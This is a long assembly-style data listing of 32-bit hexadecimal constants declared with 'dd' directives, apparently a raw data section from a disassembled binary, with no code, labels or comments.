dd 477D2F4Bh, 0A0AAF734h, 81CD8C92h, 4144F9B4h, 129C59E3h
dd 9753AA02h, 3C5D3654h, 3298D465h, 0C3E3C288h, 9DC59823h
dd 6700C066h, 0FB59DD44h, 0D9D1E955h, 0D5F6F975h, 38DA0AD1h
dd 13ABD29h, 0BAF8423h, 3957174Ah, 8A609D95h, 2A35D8B8h
dd 0D9DFCAC2h, 0E51720C5h, 92FDD7DBh, 26B7DBB6h, 0E105A0D0h
dd 0FCD40B41h, 1010BE4Bh, 4F198475h, 14E3E01h, 9328A063h
dd 4400D2FEh, 4DA70F30h, 1748227Bh, 105AD0FCh, 0A4CDC185h
dd 640856EBh, 37CA83D0h, 26E1BB27h, 0C030EC2h, 1B1A1AFDh
dd 8CAEB828h, 45A8437h, 53482612h, 0E098FA79h, 2F06C0DFh
dd 0AE670079h, 3C5887EFh, 6EBEBD70h, 0E58D0A62h, 758A4636h
dd 1AFF9A77h, 414D5D0Ch, 97C71EBFh, 0B14EDDE0h, 29F0D586h
dd 82D3302Fh, 38EA82BCh, 60EF10CCh, 6445B41Bh, 31682BBCh
dd 0ED4C7122h, 650D8181h, 1B3E2056h, 0B51A4103h, 0ADCF24DEh
dd 0CFBB8BAAh, 7F7479A0h, 43E12244h, 4CFCB03h, 2CAE457Dh
dd 0E78827AFh, 3602182Dh, 87780ED3h, 46E382BEh, 422B155Eh
dd 7469DC08h, 91142D71h, 565B962Eh, 4121C0FEh, 212263E0h
dd 17084484h, 12F14AEBh, 774448E1h, 885710FBh, 7DF93313h
dd 828D2C8h, 0AAB2FDA1h, 57FA4CB2h, 58BA1D2Ah, 4DBAADA4h
dd 0B66C0C71h, 0DA7236FAh, 0C630A67Ch, 0BE85C5E5h, 4C23152Ah
dd 2AABAE35h, 0DCCD138Ah
dd 0EB08A510h, 0B2400995h, 0E481BAA3h, 264B5DC8h, 9515F194h
dd 0C293E37Bh, 2190F71Bh, 289A46A5h, 463FE81Fh, 0A6FAFF2h
dd 419CF0C9h, 0FABB7653h, 4597BA49h, 2AB3440Ah, 1470EA99h
dd 6523EBD0h, 0DE360316h, 0BF4C185Eh, 0F0A4E104h, 0F56EC123h
dd 0C68C5065h, 0D50A1AAh, 818101B2h, 77975A00h, 0D70DE2DEh
dd 0BC2C54EBh, 0FFB90AA5h, 24B00605h, 0BB67EB2Eh, 707B126Fh
dd 0BD5B8527h, 2E8E6C6h, 371FC502h, 4DE6C841h, 0BDD9E575h
dd 2039D728h, 9A84445h, 0E4B3BA10h, 8AEA0AB6h, 87603383h
dd 0AB139F92h, 0D1C0592Bh, 6ECAB4B2h, 0C5D550EDh, 0BBE4EFDBh
dd 61156512h, 6EE3104Eh, 634B7511h, 95EBC56h, 0ED9EF12Ah
dd 28C0310Fh, 0D2C57619h, 0C6231E7Dh, 8CEC183Ah, 0BE0E7411h
dd 6D01310Ch, 112E3440h, 8D00C9FFh, 0A4702F8h, 315363F8h
dd 0A2A20032h, 8EBF0108h, 811C9579h, 8696BC24h, 3CADEB08h
dd 339C6F4Fh, 0CAE04884h, 7423F54Ch, 51A7F40Ah, 0F96FDC04h
dd 0E8806C0Dh, 0BD10D529h, 25A72852h, 65CE7773h, 0B6207468h
dd 57830BBh, 500A1D95h, 17F2FCBFh, 2B94D221h, 5A8DABAAh
dd 0D975CE81h, 0A57F595Dh, 0F9A63CD4h, 0B658BE87h, 72207D68h
dd 33D31380h, 3D9645ADh, 5E9DD15Dh, 50E150Fh, 8ED7412Ch
dd 0A5E3E626h, 6DCE137Eh, 0DD4FA359h, 3033EA20h, 5A857413h
dd 2D9EE59Eh, 0F15083BFh, 0C9904F07h, 0AC91A721h, 0D0BC746Bh
dd 0EEAE57CAh, 18A179FEh, 2FF59185h, 280A5ED8h, 802564FFh
dd 5C5583B2h, 8EA9C159h, 35ED5E79h, 0FA4E424Eh, 0BB35444Ch
dd 0DCA1F720h, 0C395D486h, 0A308F84Ah, 7A40A4E2h, 0BAC024Ah
dd 0D868A069h, 93C033EEh, 0D964EE39h, 4C64E6Dh, 26438AF1h
dd 0FEB6DD26h, 3714A3F8h, 0F3FFA0FAh, 2A3F17EAh, 5937778Ch
dd 9D5923AAh, 0C292C92Ah, 6312847Bh, 3DFC9F44h, 5E7EE82Eh
dd 54198B4Bh, 0D7A6229Fh, 0A2DA648Bh, 84631048h, 0BA5241BBh
dd 0B54C091Fh, 652118DFh, 0DAAC91A6h, 0B585AC62h, 4824ABF8h
dd 82192FF1h, 0EAF93F0Bh, 0C22A256Fh, 0E4E483E3h, 0EB38FEBCh
dd 0BA58AC62h, 8F5563C6h, 26995927h, 0DEA80454h, 7AE72468h
dd 9296328Bh, 38DD2C57h, 0AC3F3852h, 822C0B01h, 1CE0ED07h
dd 0E7E40256h, 3FAD280Bh, 3938E12Bh, 6BA6F4B4h, 0E0268C16h
dd 138D22FFh, 3D0A3CACh, 0D20A228Ah, 0EAD2FE5h, 0E62FBA50h
dd 57225228h, 49C8AD26h, 75C32556h, 7809A559h, 0AEC79177h
dd 0E91FBD4Ah, 9A5A0522h, 0DA342975h, 0D16CA038h, 0A76D22A0h
dd 0F93DD738h, 69D15379h, 1A676658h, 0D9FAE98Fh, 62462099h
dd 0FC44EAE2h, 0A92A08BFh, 0BE323AECh, 0F5D9325Eh, 0C270DA35h
dd 0ACA1D803h, 14423AB7h, 0CDDF95F6h, 4AB2C68Ah, 0F310D634h
dd 2F38DEC8h, 187BAADh, 8D5EF650h, 8C8D123Dh, 0A12894B2h
dd 83BE14D5h, 5D7650A2h, 7662A935h, 67D8EABh, 59BBDF66h
dd 5C7E0359h, 0EC02445Dh, 0EF1479Ah, 0AB1434FCh, 0F749A8CAh
dd 2B77C4A0h, 5824585Eh, 2BBF248Ch, 0EB5D8D15h, 0FD41234Fh
dd 7A293559h, 569ADC58h, 0C8618B5Dh, 0BFB14583h, 0ECE917DFh
dd 0B2ACA685h, 5D78FD44h, 0DEF71D23h, 0F938AE2h, 0B9D63F8Fh
dd 0E6F7B068h, 0B681EA65h, 3670CA3Ah, 3E207FA1h, 40CAD785h
dd 7D15A88Ah, 0C05EA912h, 492AD802h, 3E1F6102h, 0CCC6D6h
dd 716B681Dh, 20B5887Dh, 279BE37Dh, 95711168h, 48DAA53Dh
dd 0B47A168h, 0E5A7F9C3h, 3B061D12h, 0FC045F2Ch, 36854E58h
dd 49EB2BFEh, 5AAE2870h, 3CE16C25h, 51A991h, 57235251h
dd 1277F1BCh, 57E1CBE4h, 0B9E5C85Ch, 0CDAC60DFh, 48394E67h
dd 0DCF372E0h, 52E4F16Eh, 18CE80F2h, 24E74D46h, 0D1811DD2h
dd 9050F342h, 81449220h, 0C8184708h, 884418DBh, 0E340A2A9h
dd 0E54451A0h, 0B5BB9E52h, 0F2C974C4h, 510C2A31h, 0E24AE559h
dd 0F61A743Dh, 0F3781DF0h, 3CD9930Eh, 6A980CDCh, 2B79B42Ch
dd 3919AA56h, 6518555Bh, 279D74DCh, 0D8302D14h, 0F4E159C8h
dd 0EB5C85E7h, 23F70672h, 0C8917EC7h, 0D64E8EAh, 3E704A64h
dd 7E2082A1h, 0C368552Ch, 1C4170BAh, 0C6ACD83Eh, 3E28498Bh
dd 5F4BCA8Dh, 9D4CD8Fh, 0E4F1BBDEh, 0ABFDE380h, 91C4D205h
dd 3A957B44h, 2B34F018h, 0DA940054h, 11014CBAh, 82CA40D3h
dd 59604C02h, 0AC7B1DEAh, 5D652B1Ch, 24ED0DBFh, 0E8D6F4F2h
dd 0CB19BE3Fh, 27C22C6Fh, 10F34B1Dh, 0DED2760Eh, 9839B977h
dd 0BDBBBF13h, 18BFCC7Ah, 2C884EDBh, 45E1DF1Bh, 0DE82E40h
dd 0AB938FB3h, 29DFA362h, 0E44115CAh, 7E912682h, 0C8402BD9h
dd 0E87DFFEEh, 3972C557h, 471DF562h, 870463A3h, 65FFC7B3h
dd 9E889C84h, 6B70BA05h, 8F5E87CEh, 0F4947D2Fh, 95D3F6DDh
dd 58A12CEAh, 0CF4B092Eh, 90B38F02h, 11BE3FB2h, 4A18DF42h
dd 2B640B3Ch, 8A4E5EFCh, 529BD802h, 0FC089748h, 3B9A1286h
dd 483C0FAFh, 623EE6B4h, 0FC195E0h, 2AFFDFEDh, 742C6701h
dd 27941C55h, 44D61D53h, 98179D65h, 9C6952EDh, 45721720h
dd 0B2C0E248h, 23C4194Ah, 1B16E391h, 7A559491h, 0A18BBEB8h
dd 0DF339A99h, 89C083BCh, 0ED46C235h, 99A850FDh, 0ABD50FCh
dd 0A99F9066h, 9ABA2739h, 68488A9Bh, 57157B38h, 5DF617A1h
dd 4F646504h, 67D6D5D1h, 36977C79h, 8B188A66h, 160C389Ah
dd 7CA65EA0h, 0E4906DF3h, 33BEED6Bh, 358162E2h, 951FBDD2h
dd 0F884FD49h, 3BE96891h, 5F6A8FADh, 565FDCA1h, 3FCF0481h
dd 0E9233269h, 0A450859Ah, 91567F79h, 0A55B682Eh, 279EAFAEh
dd 463C5CA8h, 389ABB50h, 5CABD808h, 35D23841h, 50930ECAh
dd 959DA4BEh, 0B0D52377h, 76934B94h, 2A7C6629h, 42B9E2EAh
dd 0E5F09528h, 59BCCA2Eh, 5045DE05h, 7A4D5A39h, 0E3ECAA25h
dd 2530DD7Ah, 8FB73028h, 2BFEDF0Dh, 75596A0Fh, 469F2FA5h
dd 7A8106B0h, 538054A7h, 0BFFD7857h, 1DDF5633h, 9BFE0F5Ch
dd 10949BD4h, 0AAA8553Ch, 6D7CD6DAh, 19C5DFC1h, 0C025588h
dd 16C7B613h, 19412814h, 4948EFD5h, 108E5A71h, 914D37EDh
dd 86B712AFh, 0C00659D1h, 82540D57h, 0FF77C193h, 422AEA2Fh
dd 2C517012h, 0ABF5AD89h, 81BE14B6h, 41B1E520h, 0DAE8DC47h
dd 0E7AD03FDh, 24582885h, 0A95257C1h, 8BAEF8DCh, 0DE389510h
dd 2AFBD654h, 0BBE450C2h, 9B97C028h, 95599DDh, 0E5FF8095h
dd 0F7E95495h, 0CBA097B1h, 686A952Ah, 89757D70h, 0C92FAEB0h
dd 5A299C54h, 0CAD3ACE6h, 0A9158B09h, 0A70368B2h, 33D0943Eh
dd 0C5554231h, 0A15C9AF5h, 270FE5D5h, 0BB147828h, 97A7F4E6h
dd 3293BF48h, 5A545C9h, 0CBBA388Ch, 7C950277h, 292BFDB0h
dd 0F00CC82h, 2B9E0D2h, 61C5F6h, 0AF3CCA0Fh, 759D0762h
dd 83469AB1h, 0E617F0C0h, 8C48FB7Dh, 0F3A9690h, 67E13125h
dd 16676D10h, 1ADB02Fh, 0A82426BAh, 0B7E55754h, 0FF2E9535h
dd 1602E2B1h, 648A0827h, 6578AAFCh, 8C72771Dh, 1DAB5211h
dd 0E95657EAh, 8606C133h, 0C6D13EE4h, 89E9E537h, 50BB27F0h
dd 1AA7177Bh, 5F11C4D4h, 39C715FCh, 48BAEB72h, 0A07222A3h
dd 6091E1C8h, 12825AB5h, 865597Fh, 421F3DD5h, 0C7F1CC8h
dd 0A1414F5Ch, 0A4AA0B0Dh, 0C918449Eh, 481DDF32h, 4F13A887h
dd 0D650FC01h, 0A31082B4h, 14D1BA0Ah, 0BC858FB2h, 21381721h
dd 31E46840h, 29122AAAh, 0FBB12E9h, 0D024C8E2h, 0D27C45D4h
dd 3951C7E9h, 0EB2C6666h, 0F515612Bh, 0E2890F0Bh, 129DAFB3h
dd 0FA2E3942h, 0AB8F164Ch
dd 0E4C19C65h, 1EB8066Bh, 0BA2FF1A1h, 0EA3AD360h, 41789102h
dd 3327014Bh, 0A48938ABh, 0B62E2986h, 10F5A426h, 2702B040h
dd 6E24C19Ah, 0E79498F3h, 75205574h, 0AEB20215h, 4EEBEF97h
dd 437D1E20h, 0D10808CDh, 0F6F8B2C1h, 91445571h, 5B29293Bh
dd 0AA460CA9h, 0C0AF54E2h, 1E7BB4DAh, 5C0ED250h, 36281765h
dd 0D21D09D8h, 0C3C30476h, 5410C6Ah, 2B3FFC4h, 0E246D031h
dd 0C1474F83h, 0D45117C5h, 232852E9h, 14174096h, 0BF02DB54h
dd 44B9501Bh, 0A2C93BF6h, 0CE1BDFA7h, 5B6FE0BBh, 85D39650h
dd 83A8E29Fh, 1353BBC7h, 0FC292CC6h, 8495F097h, 9A78768Ah
dd 0A9BA5D7Fh, 72720D4Eh, 0AE4ADF46h, 0DD140887h, 1577797Bh
dd 0D8D620AAh, 0CAE194D3h, 6D7D2CBEh, 0BFB4B28Dh, 542BFBD1h
dd 368E8C3Fh, 0BC26C572h, 0D1403A29h, 2E68D156h, 0CC57C059h
dd 0F82DA144h, 27264114h, 0E8480843h, 1B65230Ah, 2E19B71Bh
dd 1FFEF03Dh, 0EF3CA6FFh, 43FB6E65h, 5921258h, 3A39D698h
dd 81F8495h, 77F99B16h, 11579C19h, 0E7D086FEh, 0E458F679h
dd 7E3DA31Ch, 7F2DDD1h, 0FCDD9CE9h, 9A73AF8Bh, 6AB3674Eh
dd 0BE1B7394h, 38BA9CE8h, 12689207h, 0A0556A55h, 2BC18F5Ah
dd 0CBB48D18h, 4CE3445Dh, 0F44EE791h, 7AFD914Eh, 99073FDFh
dd 8E487630h, 8D0463Ch, 308A1122h, 0A53CC472h, 0FE0A6AC8h
dd 24D1C0FFh, 59D5FE96h, 0E969CB7Dh, 0FD42E6A2h, 0A6A61649h
dd 736AD446h, 9734F295h, 0E9111063h, 2A6A6112h, 816E5975h
dd 0B7124E34h, 0AA07B63Ch, 8D7B85AEh, 0D810E0Dh, 0B29C9144h
dd 5B6DA461h, 166A51CEh, 4C2A4555h, 8D103CEDh, 0D9A83CB6h
dd 2DA74A18h, 0D989B107h, 58393EA6h, 28AC5B12h, 55D7E52Dh
dd 0FDB39075h, 1D4FA9A7h, 8AE4B0E7h, 4F85B3D8h, 0AD089119h
dd 0FBDFEFB7h, 0A981E27Ch, 95D40CA2h, 0F48B7E56h, 8627A867h
dd 0A289C020h, 0C9B34413h, 608D184h, 0D28407D2h, 74C1A489h
dd 9D1CE962h, 274F3A68h, 78A04E9Ch, 4613119Ah, 11520161h
dd 89D5A88Ch, 0A27513A9h, 0B89D04EAh, 0B227613Ah, 0AD89604Eh
dd 0EBA25A13h, 3AF8D704h, 6DB075E1h, 5D29D06Bh, 0BCC40FEEh
dd 0C4738460h, 65112398h, 399C208Eh, 8E6CCC2h, 0D4224734h
dd 2CAF911Ch, 0BBD383E1h, 69DC3FADh, 0E9B95330h, 175715FDh
dd 0E309CF95h, 393B1949h, 27EF2CA5h, 2CC89AD0h, 0BC8FF78h
dd 44DA197Eh, 48A6214h, 14428D10h, 46104279h, 4710989Eh
dd 92043A9Eh, 0B29FAA27h, 95C42B09h, 46A92344h, 2EBDF179h
dd 4F51BC81h, 742770BAh, 0A1BA62E9h, 0FB9D11ABh, 762A153Ch
dd 851DE19Fh, 0B96B1D88h, 2918A34Eh, 898EAF62h, 565F4DB6h
dd 558209h, 0A491E96Ch, 0A14F7362h, 1C28C540h, 5704AE09h
dd 0FE2F0C3Fh, 27FE927Ah, 0F82F9777h, 0DFC0C25h, 685CF0C8h
dd 0E9C06434h, 0AB2FDCEh, 0D5C37124h, 94AE0354h, 0E370197Bh
dd 5028C52Ah, 890CD2B1h, 1B958616h, 7570F9AEh, 0FF4EE41Dh
dd 0B6650E6Ch, 0CA68A878h, 3A601E35h, 57E17042h, 0E075FD1h
dd 0A85193FEh, 28461F8h, 792FF845h, 83D8DA34h, 0D71D5C65h
dd 0F707BD3Dh, 0B98660E0h, 61A4B409h, 9C45ECB1h, 88AE190Eh
dd 5615AAA1h, 0E440418Eh, 1D8B70Fh, 0ECEF4D14h, 9AECD2A5h
dd 0DB5C32A1h, 0EBAB430Bh, 4ABD4ACFh, 36F76490h, 9FBBC8FEh
dd 0FE67FCC2h, 8C525B9Dh, 4DF828B0h, 0C1A2EB73h, 0A8FF1477h
dd 0DC55A53Ah, 6332EB4h, 1D9B43FAh, 4A4CC40Ch, 0B214A1FEh
dd 44108183h, 5E0E3FE9h, 824E1F88h, 6E5C8BFCh, 0FE1F6FA5h
dd 7FC02F5Ch, 54DDB6A0h, 7FC94292h, 3C4B180Ah, 53731537h
dd 8915FA91h, 66E024BFh, 0C0113728h, 0EA22C9E1h, 40A098A4h
dd 836CA219h, 0EC51AB95h, 51028231h, 642227Eh, 1F5F8088h
dd 4A07657Ch, 578AC9F7h, 0B96814C0h, 0F1C67FD4h, 0EA5D6229h
dd 1890D1BFh, 611D2CA8h, 0C0AC450h, 517D4B50h, 4A0C6257h
dd 68C136F0h, 0C7DD955Dh, 0EEBE500Bh, 0DB91AB38h, 6524B2EDh
dd 0DF8C85D7h, 9D21050Ah, 5FFEBEFh, 0EEA4CA1Ch, 23C7EE3Ah
dd 4EE4DE8h, 0C763BF69h, 2B1DB0BEh, 0A7E1EF93h, 1FA4BFA6h
dd 0BE470FCAh, 3F29A14Fh, 6A9B1F84h, 22E8DFFEh, 5743C178h
dd 12A75954h, 328F56F4h, 0D2417FFCh, 5270D156h, 3EFC1068h
dd 0C904BDDAh, 2C2338Ah, 68FB5077h, 0CABA46B0h, 4D1E453h
dd 8625C429h, 0D238DF1Fh, 4D40DD1Ch, 0A622ABA0h, 4695FFEh
dd 670A968Dh, 8FCE5569h, 0DF63CD6Fh, 0AE3DAA62h, 0D5FAA6h
dd 0FB214FBAh, 4FCF95D6h, 3792ABB9h, 90DAAF73h, 55DD0374h
dd 2262359Eh, 2795B5F0h, 74C5568Ch, 7CC4776Dh, 0BEDA15A0h
dd 0AAD92A0Bh, 3F0B738Dh, 7F1D68FDh, 5C78F0D0h, 0F55F0939h
dd 77703D72h, 0DC506CB1h, 0C5D5C431h, 55CF049Eh, 0F72C7950h
dd 7C2A289Bh, 516A7BB7h, 0F16A0821h, 0D2F926FEh, 0AAA63AC0h
dd 41CAA4A2h, 166CB32Ch, 9B5AEA44h, 458F0CE6h, 8638557Eh
dd 0ABFD067h, 0C05727E7h, 0F118DBD7h, 59600192h, 7D2E85C0h
dd 4C726304h, 28316A40h, 58061436h, 699F4A9Dh, 0F6AB2E30h
dd 90884B0Bh, 3CF4E368h, 10C9C5DAh, 0E509A40Fh, 0E207DFE6h
dd 0FB34574Ch, 88A7D935h, 6FAC7966h, 0F2A30250h, 0AB6B6FCCh
dd 0A296000Ch, 0AEA68328h, 9111B74h, 0B6CACC55h, 1C4A3C7Ah
dd 477578h, 2B90F855h, 8124DFBBh, 307CFE2Eh, 6FC1E0FAh
dd 372BFFBDh, 67F30166h, 82A6F070h, 0DD1A33EEh, 2ECA9FEFh
dd 6D525210h, 5EFA7E7Dh, 3DE85155h, 0D04A4AEAh, 0D102855Dh
dd 0F92E7F15h, 0A6A89CF5h, 38C9565Fh, 7F5DBF3Bh, 4E55827Dh
dd 4A2A2977h, 0E8DAFC53h, 13F1C40Ah, 2BD7160Fh, 0A96E3751h
dd 3DDC484Bh, 0AE86CF5Fh, 41308338h, 35FD8668h, 0B55F3580h
dd 0F2453E36h, 819DE2FDh, 941705A7h, 9307EB73h, 0FDE41757h
dd 8530817Eh, 34257117h, 0AFDF9AB2h, 909F01FCh, 3310C7DBh
dd 72949759h, 2F5D778Ah, 112B0D9Ch, 0D4AF6DD4h, 50D94715h
dd 0E557E8EAh, 8D3AD70Bh, 0EEE1C1EBh, 0F78E8285h, 17BEA75Eh
dd 8829DA95h, 3A8203F0h, 6EB255F0h, 272F54Ch, 0F6654873h
dd 2239050Ch, 5C59157Ch, 0CAE1403h, 36B27920h, 1B8CEC73h
dd 0D008025h, 16C3E34Dh, 0FB970666h, 3BCA3122h, 2BB152F6h
dd 2BF19C98h, 86DB58h, 77B07B59h, 899DD4CCh, 0DB707E36h
dd 0ECB6B415h, 0C0F855DDh, 44921E83h, 0E87E78AAh, 0CBB305C9h
dd 62297004h, 7B66D4C8h, 7933BAB5h, 47AB1C69h, 57ADC5E3h
dd 31D3EFD1h, 0B5D8334Fh, 0EEF8F631h, 0EBED6AB5h, 0FA014AA1h
dd 0D2B331Fh, 21F834ABh, 0AE78F06Bh, 10354FB3h, 1A7A26ABh
dd 0F3300420h, 85327CFFh, 0D933D9E1h, 690A2502h, 29E5E4CEh
dd 40211CCAh, 481918C5h, 86C23FF3h, 0B18D6F8Ah, 0CBC728ABh
dd 80BE8A06h, 0B8C6C215h, 41C2EAD7h, 0ECBC80Eh, 0DEB3096h
dd 552EB001h, 3E12950h, 321FAD20h, 7A32A406h, 908A8657h
dd 23190346h, 0EADFEECFh, 0ED488AA2h, 19496CC4h, 61558E16h
dd 89A6E428h, 6F5FEF1Dh, 4F98E21Fh, 0AC7C5D63h, 0A517628Bh
dd 2CAF6DC4h, 0D788F7E4h, 60FBA794h, 5F18CFAEh, 63955A49h
dd 1B32DE14h, 0DE188C16h, 52A0B2Ch, 2E915DE6h, 6A82319Ah
dd 4303C33Dh, 2BB4E349h, 0AA7D16A2h, 3732DD62h, 6E320C20h
dd 8322725Ch, 0A955B8E4h, 58B69E95h, 99EF1FB5h, 9199142Fh
dd 50858FB0h, 8404EA92h, 0BD411FCDh, 819AA681h, 0C411FC64h
dd 0FC8CA97Dh, 58757D8h
dd 2783906h, 56F249C6h, 38416B10h, 0C6FF4083h, 0C00603D3h
dd 7649522Ch, 74B8683Dh, 0AC6EE405h, 874C902Bh, 0E30C1FB7h
dd 0C2A3FA4Eh, 0CA01688Dh, 2B461232h, 2AB8BF83h, 0D3975245h
dd 0C4A78611h, 34ED5C08h, 0B12418BBh, 0DE819E03h, 748ECA08h
dd 0B58690C9h, 9840DAA1h, 3069A207h, 3169B5D1h, 43F0716Dh
dd 0F7FDC8A8h, 55D4579Fh, 81E94422h, 94283422h, 284CBEF4h
dd 83915AB1h, 43DA1B9Eh, 0ED83AC57h, 284328E7h, 3711594Bh
dd 338C534Dh, 93B52566h, 7393EA36h, 0BB011129h, 8A89E2EAh
dd 1FA87829h, 494C5070h, 9E6552ABh, 7622C719h, 581B01ABh
dd 6D7D2003h, 0B584E945h, 596672E8h, 51AB0D19h, 356D92A6h
dd 144D018h, 71405395h, 2B64CA27h, 970DEF61h, 0B2C5987Dh
dd 3E9972C1h, 0C9BF993Dh, 9363E33Ah, 4CED03ADh, 6802F06h
dd 0D936314Bh, 0A0C95E6Dh, 5908126Ah, 3B27DA1Ah, 24D11BEh
dd 77DCC234h, 4C405E31h, 3FE581DCh, 0CB8E0AB0h, 5A4E13D5h
dd 93E6CA35h, 7FFA9B48h, 54D2AC17h, 46347327h, 64FC212Dh
dd 0C2EEA45Ah, 0BCCAA29Ch, 201206D6h, 20375E96h, 3E730CA1h
dd 9B2852F0h, 18122918h, 1ACA18F7h, 1A863600h, 1D4B180Bh
dd 50AB19A9h, 0B11698FEh, 201146ADh, 38253494h, 0BBB6A20h
dd 5606D2BEh, 0C7A717E6h, 1C754A03h, 0F89DFC3Fh, 5E591A2Dh
dd 0A1709DBAh, 64D998Fh, 8CB35FDAh, 8B36108h, 0A4243205h
dd 28165DEBh, 0A7ACE5D7h, 965017FEh, 0EBB8D384h, 8CDB8501h
dd 340C7C34h, 0C97A5813h, 934DDE26h, 4D33E602h, 0DD73CA54h
dd 0C48858Bh, 46E78526h, 816A6863h, 5435E53h, 0AB3C4BEh
dd 0A6C2EF37h, 0FCC55BA5h, 0F0108581h, 0A521905Ah, 0B75EBE89h
dd 8BBA2892h, 29A873A3h, 9CC04EB2h, 4B95027Dh, 0A1D14E23h
dd 60BE345Bh, 1B28C45Ah, 7EB652A8h, 0B66E4CC5h, 96A47F1Ah
dd 5DE65DD9h, 0D17E600Eh, 0CDA68B46h, 81422508h, 64D1FB12h
dd 9A2B517Eh, 0AB47A177h, 0CBAD8BADh, 0A5F6F6D6h, 0FE6694C7h
dd 26182682h, 6A30CC1Dh, 0B8885F8Eh, 31A70E5Eh, 0CA091AC1h
dd 402A280h, 8608AF9Bh, 2BE8C1Dh, 68A9D982h, 13CF9646h
dd 0D4990E64h, 59755A45h, 0D094CD09h, 3FC342C3h, 547254E4h
dd 0D0028468h, 43C1188Ch, 6C8D8901h, 0EDF04075h, 0FAD8FFC6h
dd 0B2EA13F7h, 0CCA1D84Eh, 972F9840h, 85675C48h, 0D2E44687h
dd 5C30E62Eh, 2A1E440h, 4ECA905Ch, 0D9FA0C7Ah, 130FEA63h
dd 8A50F72Eh, 0CFEE9AEAh, 5DD9DC44h, 2C4CED0Dh, 5D7FE090h
dd 3C16140h, 0E0496069h, 0FEEC97FFh, 515B802Dh, 4311AD9Ah
dd 0D525308Eh, 62B05B35h, 0D648DD03h, 21DB8317h, 0A1B2A2D3h
dd 0F91B0301h, 672EB3DFh, 8D85B4D8h, 756590F1h, 7B4AD5EAh
dd 0C7277FB7h, 25F9B27h, 0A3F40EA6h, 99725B6Eh, 42B6860Dh
dd 0F5A01779h, 302A6B18h, 0D94264DDh, 0E8E2EA7Bh, 0B6C3F509h
dd 0B74020CCh, 0E1260AFCh, 54618187h, 19500A8Fh, 353A2369h
dd 0C505432Ah, 4C4DBD59h, 59701402h, 9C607541h, 2EEC8238h
dd 0B620E58Ah, 89278B30h, 0BD6ECEA6h, 0DCBA2EE9h, 0F40D11EBh
dd 97C9623Ah, 22F1484h, 358D056Bh, 0BC30D99Ch, 0A2EE2669h
dd 1D72B0A9h, 9C138DCDh, 4A244ED0h, 0F0D22C25h, 95FBAFDDh
dd 0F77F5284h, 7C09832Bh, 0D901A109h, 0D550F0CBh, 7D1F8790h
dd 5FBD08A0h, 0A1815D1Dh, 0DEF3F1B4h, 4DA224AFh, 45ACF15h
dd 3D2288D1h, 4D3A1894h, 0B1B0F768h, 9076560Ch, 10944C50h
dd 0DA27C0A6h, 952333EFh, 13E9D8C1h, 30688BE5h, 2882AE8Dh
dd 76526BDCh, 0BAFEBED5h, 9AB48C14h, 9C1F0E2Bh, 0BF67E6Dh
dd 9AB94E36h, 3EDFDB3Bh, 1A74B904h, 6AD20601h, 0D3044005h
dd 701104ABh, 696A2FF0h, 0ABE9A782h, 5000BA45h, 504A5BCAh
dd 4AFD56DDh, 0FF67ED60h, 72A07042h, 0C091A024h, 35D095DEh
dd 0F7E02B86h, 0BAE81A85h, 0A2A73549h, 0BBDEF163h, 321C00F2h
dd 52BADC8Eh, 9AE1FA24h, 4937AFB0h, 0F2A5E659h, 7E185099h
dd 22764F0h, 0E8C1780Fh, 73E0E0C7h, 0A30B33FEh, 69423C7Bh
dd 139CEBDDh, 0FC4D18D2h, 13B91017h, 0D2BF37D1h, 0A6B0FF73h
dd 0E51B8D5Ah, 0C9406A85h, 0DCFA2907h, 51FF5CBBh, 0FA7AB87h
dd 0E24C27A4h, 760C2BE8h, 0A3E07B0Ch, 0C7D03E91h, 0D1711D06h
dd 7423B842h, 9DF35B1Ch, 5FBFD753h, 0C188EEB3h, 91A16707h
dd 0F9E90967h, 50304A1Ah, 95D01407h, 0B56E450Fh, 7EF5D292h
dd 0DB18F152h, 69A6D0C8h, 48698F5Ch, 49FFEB32h, 0C281C857h
dd 0FCB3F532h, 1A7D8728h, 45B92A67h, 0AED81117h, 879C208Dh
dd 0BAD5E596h, 2806FBB4h, 6C46E0ACh, 5F747F3h, 0FF6AF814h
dd 7E8A2B6Ch, 87459168h, 0F5E08FC4h, 571FA1FAh, 988141F1h
dd 5DF82E0h, 0FFDBE10h, 0DA572E76h, 62EDE0BBh, 0E53C74BDh
dd 71932021h, 82AECF92h, 0A6EB693Bh, 9657E901h, 0BBA4EE49h
dd 50D6112Ch, 413B0B62h, 68E8A682h, 0DB86EFBBh, 1FB0455Dh
dd 54A6A022h, 0EC02D595h, 733D698Bh, 1974AD32h, 977455C4h
dd 0BCB999D5h, 5AD23C22h, 0DCF2AE4Ah, 0ACC320BBh, 0B4CEA005h
dd 561ECF48h, 0B1C1975Ah, 0A355DD2h, 491EFB0Dh, 0A6443530h
dd 68F75CCh, 77812D14h, 0B472D5Dh, 5644C3BCh, 911C372h
dd 0EE158621h, 66C09771h, 67AF5759h, 4D5D9D07h, 0E63A0FC6h
dd 7F0FB482h, 95F76864h, 0CC9E8A03h, 0A2BB832Eh, 0A92A33C3h
dd 0FD93B065h, 88660ADBh, 32F5E4BBh, 761082B5h, 4A4FCD57h
dd 0FF29A8CAh, 0D7288BA1h, 0AF8B0678h, 35AF1192h, 40C4A9C1h
dd 0C63CFB1h, 0B231AFFDh, 8BA86BC5h, 5083391Eh, 0B9B05036h
dd 0AAED24D7h, 8A848B55h, 80933DD1h, 0DA28811Dh, 21F6C0C4h
dd 12F4D977h, 140605D5h, 5CA9C59Fh, 9D528CC5h, 1D3DAAADh
dd 1073A0F2h, 0B32C7125h, 0F22B4D46h, 0A6FDA1C8h, 0DACC9120h
dd 0DD25EE2Ch, 0E2FB9623h, 0D8BB5609h, 4707D0B2h, 0BE1EB543h
dd 0B39CE7AEh, 4B435835h, 0D77112B7h, 32056B33h, 2EB56453h
dd 96497031h, 31A565DDh, 0DB1D749Ah, 0B5658E47h, 0AACA5DB9h
dd 404CDD93h, 0FCAB73Dh, 0EEDD6E4Dh, 0DC7F880Ah, 7E39D762h
dd 82AE5F49h, 5345CEE9h, 0C885D295h, 0D6908B38h, 1FAFCDC9h
dd 545DC4FAh, 84A15AC8h, 0CBB57BA8h, 7847D1CAh, 6C400B34h
dd 11322161h, 39580B63h, 0B7990903h, 0DDD6BE8h, 7E368A54h
dd 32062207h, 8570BFB4h, 0A6F51D90h, 0F0FB0C36h, 0F1DEBE83h
dd 0A1020EAh, 38A30DCEh, 62F7D027h, 0D6A9400Ch, 0C11BDD43h
dd 5E9D05A2h, 0CB7E5DE5h, 0FA658778h, 6F86E177h, 2E09D22Ah
dd 8C2FE17h, 2175A910h, 942612B2h, 2B3FA23Eh, 8E44FC05h
